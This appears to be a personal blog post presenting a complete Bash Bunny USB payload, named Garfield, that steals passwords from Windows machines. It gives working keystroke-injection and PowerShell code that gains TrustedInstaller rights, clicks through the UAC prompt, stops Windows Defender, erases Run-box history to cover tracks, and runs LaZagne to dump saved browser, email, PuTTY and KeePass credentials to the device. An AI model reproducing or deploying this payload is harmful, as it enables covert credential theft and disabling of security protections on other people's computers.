Bash Bunny Payload: Garfield steals passwords with LaZagne

The Bash Bunny is a USB attack platform developed by Hak5 a security research group. It’s a  device that looks like a USB memory stick, except it is a small computer running a Debian based Linux OS with a desktop class SSD and a quad core ARM processor. It can be configured to be a HID (Human Interface Device), storage device, serial device and USB based network adaptor in order to carry out automated tasks on a computer. For more information I wrote a Bash Bunny Primer article here.

My most recent payload I’ve named Garfield because it uses a tool called LaZagne to ‘backup’ passwords from common programs in a Windows installation. LaZagne is flagged by Windows Defender (and probably other AV) as malware, so my payload disables Windows Defender before running the tool. Below, I walk through the payload and explain my process.

There are a few prerequisites: the current user must be in the administrators group and Windows Defender must be the real time AV product running but this script could be adapted for other antivirus products easily.

This payload uses the following tools:

You can find all my Bash Bunny payloads on GitHub.

######## ATTACK ########
ATTACKMODE HID STORAGE
LED ATTACK
RUN WIN "PowerShell.exe -noe -c ". mode.com con: lines=1 cols=12""
sleep 2
Q STRING "\$src1 = (gwmi win32_volume -f 'label=''BashBunny''').Name+'bin\runasti64 powershell'"
Q ENTER
sleep 1

The primary commands here are RUN WIN which uses the Windows run box to open a PowerShell session, and then use the tool RunAsTI64 to open a PowerShell session as TrustedInstaller.

Windows Defender on the latest versions of Windows 10 cannot be disabled by a regular user or administrator. It can only be disabled by a user running with TrustedInstaller privileges.

Fun fact: TI privileges were first introduced with Windows Vista.

Q STRING "powershell -ep bypass \$src1"
Q ENTER
sleep 5
Q ALT Y
sleep 2

PowerShell runs the RunAsTI64 tool and opens an elevated PowerShell session. This causes UAC to pop up, so the SLEEP 5 waits long enough for the UAC prompt to appear. Sending ALT Y bypasses the prompt.

Q STRING "net stop windefend | Out-Null"
Q ENTER
sleep 1
Q STRING "exit"
Q ENTER
sleep 2

In the elevated PowerShell session, we disable Windows Defender by simply stopping the service and then we close the PowerShell window to give focus back to the previous session.

I’ve tried other ways of disabling Windows Defender, but this way ended up being the fastest and most straightforward.

Q STRING "\$src = (gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\g.ps1'"
Q ENTER
sleep 1
Q STRING "powershell -ep bypass \$src"
Q ENTER
sleep 1
Q STRING "exit"
Q ENTER

Finally, we run the PowerShell script that runs LaZagne and then exit the PowerShell session.

The entire process takes around 10 seconds to run.

Below I’ll walkthrough the PowerShell script.

# Vars for log
$destFile = ("$env:COMPUTERNAME-{0:yyyy-MM-dd-HH-mm-ss}.log" -f (Get-Date))
$ToolPath = ((Get-WmiObject win32_volume -f 'label=''BashBunny''').Name+'bin')
$destPath = ((Get-WmiObject win32_volume -f 'label=''BashBunny''').Name+'loot\Garfield')
$dest = "$destPath\$destFile"

Here we set the variables for the paths to the tool and the log.

Since this is running from the BashBunny’s storage and we don’t know what drive letter Windows will assign it, we use WMI to get the drive letter from querying the USB drive with the label ‘BashBunny’.

# Clear Run history
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name * -ErrorAction SilentlyContinue

Now we remove the history of the Windows run box, cleaning up our tracks behind us.

# Get passwords
& $ToolPath\lazagne.exe all | Out-File -FilePath $dest -Encoding ASCII

Add-Content -Path $dest -Value ""
Add-Content -Path $dest -Value "Have a nice day ;)"

Finally, we run the LaZagne tool and dump all the passwords it finds to the log file.

We could go use the RunAsTI tool again to restart the Windows Defender service for maximum cleanup and hiding our tracks. I opted to leave it out of this payload for the process runs quicker.

The programs that LaZagne can get passwords from is impressive, but the main programs are Firefox, Chrome, Internet Explorer, Outlook, RDP Manager, Putty, KeePass and many more. The full list is available on LaZagne’s documentation page.

I hope this article is useful to you. If you want to get in touch with me please feel free to use the comments, Twitter or my contact form.

Please consider supporting my work: monthly on patreon, or by buying me a coffee with paypal, or ko-fi.

-Mike

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Create a website or blog at WordPress.com

Up ↑

%d bloggers like this: